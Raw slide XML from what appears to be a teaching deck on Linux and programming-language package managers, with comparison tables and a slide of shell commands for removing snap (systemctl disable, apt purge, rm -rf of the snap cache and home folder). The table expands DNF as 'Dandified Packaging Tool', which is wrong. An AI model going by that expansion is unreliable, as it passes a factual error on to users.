          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226325" y="1652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420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Package Managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="615" name="Google Shape;615;p111"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="226325" y="864800"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2840200"/>
                <a:gridCol w="2840200"/>
                <a:gridCol w="2840200"/>
              </a:tblGrid>
              <a:tr h="395400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1500">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Version</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">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38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Package Manager</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">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38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Full Form</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">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tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="391475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Ubuntu</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APT / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Snap</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Advanced Package Tool</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r>
              <a:tr h="585775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Amazon Linux 2023, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CentOs </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YUM</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Yellowdog Updater, Modified</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r>
              <a:tr h="391475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ALPINE</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APK</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Alpine Package Keeper</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r>
              <a:tr h="391475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Gentoo</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600">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emerge</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Portage</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600">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r>
              <a:tr h="391475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RedHat</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RPM</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Red Hat Package Manager</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r>
              <a:tr h="391475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Debian/Ubuntu</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dpkg</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Debian package</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r>
              <a:tr h="391475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Amazon Linux, Fedora 22, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CentOS 8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, and RHEL</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DNF</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Dandified Packaging Tool</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r>
              <a:tr h="585775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OpenSUSE and SUSE Linux Enterprise</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38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ZYpp</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1100"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1100"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ZYpper</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="38761D"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> package manager</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:srgbClr val="38761D"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="38761D"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="38761D"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="38761D"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="38761D"/>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12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226325" y="2209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Programing </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3020">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Language</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3020">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3020">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Package Managers</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="621" name="Google Shape;621;p112"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="226325" y="864800"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2130150"/>
                <a:gridCol w="2130150"/>
                <a:gridCol w="2130150"/>
                <a:gridCol w="2130150"/>
              </a:tblGrid>
              <a:tr h="395400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1500">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Language</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Package Manager</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Full Form</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">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AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Repo Website</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1500">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr">
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:schemeClr val="dk2"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="391475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>NodeJs</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6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>npm/yarn/pnpm</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6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Node Package Manager</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u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>https://www.npmjs.com/</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91475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Python</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6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pip</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a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pip Installs Packages</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u="sng">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>https://pypi.org/</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91475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Ruby</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6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>gem</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91475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>PHP</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6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>composer</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91475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>JAVA</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rgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Gradle / Maven</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b="1">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hlink"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:uFill>
                            <a:noFill/>
                          </a:uFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>https://mvnrepository.com/</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="hlink"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:uFill>
                            <a:noFill/>
                          </a:uFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>https://gradle.org/</a:t>
                      </a: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13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226325" y="2209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How to remove snap package manager ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p113"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465250" y="958350"/>
            <a:ext cx="8281800" cy="37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solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl disable snapd.service</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl disable snapd.socket</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo systemctl disable snapd.seeded.service</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo snap list</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt autoremove --purge snapd</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo rm -rf /var/cache/snapd/</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rm -rf ~/snap</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="6AA84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33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="116475" y="129548"/>
            <a:ext cx="8911050" cy="4906664"/>
            <a:chOff x="116475" y="129548"/>
            <a:chExt cx="8911050" cy="4906664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="150" name="Google Shape;150;p33"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="15533" l="0" r="1215" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="116475" y="753588"/>
              <a:ext cx="8911050" cy="4282625"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="151" name="Google Shape;151;p33"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="40582" l="23059" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6351475" y="1105725"/>
              <a:ext cx="539024" cy="619576"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="152" name="Google Shape;152;p33"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="15768" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5626600" y="129550"/>
              <a:ext cx="539025" cy="665231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="153" name="Google Shape;153;p33"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId6">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect b="9877" l="0" r="0" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="513900" y="228575"/>
              <a:ext cx="507888" cy="619576"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="154" name="Google Shape;154;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1101275" y="348750"/>
              <a:ext cx="11097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Bill Gates</a:t>
              </a:r>
              <a:endParaRPr sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="155" name="Google Shape;155;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6221800" y="205725"/>
              <a:ext cx="11097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Dennis</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1100"/>
                <a:t>Ritchie</a:t>
              </a:r>
              <a:endParaRPr sz="1100"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="156" name="Google Shape;156;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6066138" y="848150"/>
